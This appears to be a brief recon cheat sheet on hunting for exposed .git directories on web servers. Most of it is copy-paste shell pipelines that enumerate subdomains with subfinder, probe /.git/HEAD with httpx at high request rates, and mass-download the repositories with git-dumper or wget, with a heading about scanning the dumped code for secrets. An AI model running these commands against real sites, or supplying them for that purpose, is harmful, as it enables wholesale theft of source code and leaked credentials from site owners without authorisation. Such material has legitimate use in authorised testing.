j4xx3n

How to Hunt for Exposed .git Dorectories

Dumping the Repo

echo example.com | subfinder -all -o subs.txt

cat subs.txt | httpx-toolkit -path /.git/HEAD -silent -mr "refs/heads" -rl 500 | tee git.txt 

cat git.txt | cut -d '/' -f1,2,3,4 | while read url; do git-dumper $url git-dumper/$url; done

One Liner

echo example.com | subfinder -all | httpx-toolkit -path /.git/HEAD -silent -mr "refs/heads" -rl 500 | cut -d '/' -f1,2,3,4 | while read url; do git-dumper $url git-dumper/$url; done

Manual Dump

wget --mirror -I .git https://example.com/.git/

Scanning the Repo for Secrets

Resources

• Web security - exposed .git folder in production
• Git Exposed - How to Identify and Exploit
• Red Book - Exposed Git Repositories